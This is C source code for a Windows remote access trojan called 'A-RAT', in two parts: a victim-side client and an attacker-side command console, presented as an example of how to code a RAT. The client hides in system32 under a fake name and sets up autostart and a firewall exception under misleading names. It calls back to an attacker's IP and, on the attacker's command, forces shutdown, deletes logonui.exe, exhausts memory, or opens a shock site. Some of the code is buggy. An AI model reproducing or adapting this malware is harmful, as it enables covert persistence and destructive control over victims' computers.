Examples of how to code a RAT in C
Client:
/* A-RAT
BY Shoxin/Akiimoko */
#include <time.h>
#include <stdio.h>
#include <stdlib.h>
#ifndef _MSC_VER /* if the compiler isn't microsoft visual studio c++ 2005. */
#include <windows.h>
#endif
#include <winsock2.h>
#define MAXPENDING 5
#define BUFFER_SIZE 1024
#define LISTENING_PORT 31337
#define RANDOM_PORT 55555
#define CLIENT "taskmgrbak"
#define SERVER_IP "Your IP Here"
int func_proc(char c)
{
switch(c)
{
case 's':
case 'S':
system("shutdown -s -t 01 -f"); /* when implementing this feature ExitW
indowEx would not function properly
in the tests so i used system("shutdown"
) for the time being. */
break;
case 't':
case 'T':
SetWindowText(FindWindow(0,"Windows Live Messenger"),"You just got served!"
);
break;
case 'm':
case 'M':
while(1);
{
char *a = malloc(20971520);
char *a2 = malloc(20971520);
a = a2;
}
break;
case 'd':
case 'D':
remove("C:\\WINDOWS\\system32\\logonui.exe");
break;
case 'n':
case 'N':
ShellExecute(
NULL,
"open",
"notepad.exe",
NULL,
NULL,
SW_SHOW);
case 'o':
case 'O':
ShellExecute(
NULL,
"open",
"http://www.meatspin.com",
NULL,
NULL,
SW_SHOW);
break;
}
}
int main(int argc, char **argv)
{
HKEY autoKey;
HKEY fwKey;
int menu_switch = 0, message_length = 0, remote_length = 0;
SOCKET local_socket, remote_socket,message_len;
struct sockaddr_in local_address, remote_addr;
WSADATA wsa_data;
char message[BUFFER_SIZE], remote_ip[32];
int recv_timeout = 90000, send_timeout = 90000, recv_buffer_len;
CopyFile("Client.exe", "c:\\windows\\system32\\taskmgrbak.exe", 0);
RegCreateKeyEx(HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\
\Run", 0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL,
&autoKey, 0);
RegSetValueExA(autoKey, "windows firewall", 0, REG_SZ, CLIENT, 50);
RegCloseKey(autoKey);
RegCreateKeyEx(HKEY_LOCAL_MACHINE, "SYSTEM\\ControlSet001\\Services\\" "SharedAcc
ess\\Parameters\\FirewallPolicy\\StandardProfile\\"
"AuthorizedApplications", 0, NULL, REG_OPTION_NON_VOLATILE, KEY_AL
L_ACCESS, NULL, &fwKey, 0);
RegSetValueExA(fwKey, "windows live update", 0, REG_SZ, CLIENT, 50);
RegCloseKey(fwKey);
sleep(60000);
if(WSAStartup(MAKEWORD(2, 2), &wsa_data) != 0)
{
fprintf(stderr, "WSAStartup failed\n");
return 1;
WSACleanup();
}
if((local_socket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET)
{
fprintf(stderr, "socketing failed\n");
return 1;
WSACleanup();
}
if((remote_socket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET)
{
fprintf(stderr, "socket() failed");
return 1;
WSACleanup();
closesocket(local_socket), closesocket(remote_socket);
}
memset(&local_address, 0, sizeof(local_address));
local_address.sin_family = AF_INET;
local_address.sin_addr.s_addr = htonl(INADDR_ANY);
local_address.sin_port = htons(RANDOM_PORT);
if(bind(local_socket, (struct sockaddr *) &local_address, sizeof(local_address))
!= 0)
{
fprintf(stderr, "binding failed\n");
return 1;
WSACleanup();
closesocket(local_socket), closesocket(remote_socket);
}
memset(&remote_addr, 0, sizeof(remote_addr));
remote_addr.sin_family = AF_INET;
remote_addr.sin_port = htons(31337);
remote_addr.sin_addr.S_un.S_addr = inet_addr(SERVER_IP);
if(connect(remote_socket, (struct sockaddr *) &remote_addr, sizeof(remote_addr))
== SOCKET_ERROR)
{
fprintf(stderr, "connecting failed\n");
return 1;
WSACleanup();
closesocket(local_socket), closesocket(remote_socket);
}
remote_length = sizeof(remote_addr);
if(setsockopt(local_socket, SOL_SOCKET, SO_RCVTIMEO, (const char *) &recv_timeout
, sizeof(recv_timeout)) == SOCKET_ERROR)
{
fprintf(stderr, "recv_timeout failed\n");
WSACleanup();
closesocket(local_socket), closesocket(remote_socket);
}
if(setsockopt(local_socket, SOL_SOCKET, SO_SNDTIMEO, (const char *) &send_timeout
, sizeof(send_timeout)) == SOCKET_ERROR)
{
fprintf(stderr, "send_timeout failed\n");
WSACleanup();
closesocket(local_socket), closesocket(remote_socket);
}
while(1)
{
if((message_len = recv(remote_socket, message, sizeof(message), 0)) == SOCKET_
ERROR)
{
fprintf(stderr, "recv failed\n");
return 1;
WSACleanup();
closesocket(local_socket), closesocket(remote_socket);
}
func_proc(*message);
}
WSACleanup();
closesocket(local_socket), closesocket(remote_socket);
return 0;
}
Hosting:
/* A-RAT
BY Shoxin/Akimoko*/
#include <stdio.h>
#include <stdlib.h>
#ifndef _MSC_VER /* if the compiler isn't microsoft visual studio c++ 2005. */
#include <windows.h>
#endif
#include <winsock2.h>
#define MAXPENDING 5
#define BUFFER_SIZE 1024
#define LISTENING_PORT 31337
int main(int argc, char **argv)
{
SetConsoleTitle("A-RAT - Shoxin");
SetConsoleTextAttribute(GetStdHandle(STD_OUTPUT_HANDLE), FOREGROUND_BLUE | FOREGR
OUND_INTENSITY );
int menu_switch = 0, message_length = 0, remote_length = 0;
SOCKET local_socket, remote_socket,message_len;
struct sockaddr_in local_address, remote_address;
WSADATA wsa_data;
char message[BUFFER_SIZE], remote_ip[32];
printf("Aki-RAT v.0.1b \n"
"By Shoxin \n"
" \n"
"::Developer Version:: \n"
" \n"
"shouts: \n"
"dw0rek,Mad-Hatter,g00ns.net \n");
printf("Features/Usage: \n"
" \n"
".Remote Shutdown[S] \n"
".Rename Windows Live Messenger Title[T] \n"
".Delete Logonui.exe[D] \n"
".Extreme Memory Leak[M] \n"
".Open Notepad[N] \n"
".Open Meatspin.com[O] \n"
" \n"
"Usage: 'S'\n"
" 'T'\n"
" 'D'\n"
" 'M'\n"
" etc. \n");
if(WSAStartup(MAKEWORD(2, 2), &wsa_data) != 0)
{
fprintf(stderr, "WSAStartup failed\n");
WSACleanup();
return 1;
}
if((local_socket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET)
{
fprintf(stderr, "socketing failed\n");
WSACleanup();
return 1;
}
memset(&local_address, 0, sizeof(local_address));
local_address.sin_family = AF_INET;
local_address.sin_addr.s_addr = htonl(INADDR_ANY);
local_address.sin_port = htons(LISTENING_PORT);
if(bind(local_socket, (struct sockaddr *) &local_address, sizeof(local_address))
!= 0)
{
fprintf(stderr, "binding failed\n");
WSACleanup();
closesocket(local_socket), closesocket(remote_socket);
return 1;
}
if(listen(local_socket, MAXPENDING) != 0)
{
fprintf(stderr, "listening failed\n");
WSACleanup();
closesocket(local_socket), closesocket(remote_socket);
return 1;
}
remote_length = sizeof(remote_address);
if((remote_socket = accept(local_socket, (struct sockaddr *) &remote_address, &re
mote_length)) == INVALID_SOCKET)
{
fprintf(stderr, "accepting failed\n");
WSACleanup();
closesocket(local_socket), closesocket(remote_socket);
return 1;
}
printf("Connection Established\n");
message_len = 1;
while(1)
{
printf("-");
*message = getchar();
*(message + message_len) = '\0';
if(send(remote_socket, message, strlen(message), 0) == SOCKET_ERROR)
{
fprintf(stderr, "send failed\n");
return 1;
WSACleanup();
closesocket(local_socket), closesocket(remote_socket);
}
}
WSACleanup();
closesocket(local_socket), closesocket(remote_socket);
return 0;